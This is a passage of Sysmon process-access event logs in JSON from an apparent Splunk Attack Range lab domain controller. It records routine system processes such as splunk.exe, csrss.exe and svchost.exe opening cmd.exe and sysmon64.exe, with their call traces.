Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2015,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-106D-5F25-0000-001067C70300}\r\nSourceProcessId: 3896\r\nSourceThreadId: 3920\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-001062EB0300}\r\nTargetProcessId: 3952\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-106D-5F25-0000-001067C70300}","SourceProcessId":"3896","SourceThreadId":"3920","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-001062EB0300}","TargetProcessId":"3952","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2016,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-001062EB0300}\r\nTargetProcessId: 3952\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-001062EB0300}","TargetProcessId":"3952","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2017,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2018,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2019,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2020,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2021,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2022,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2023,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 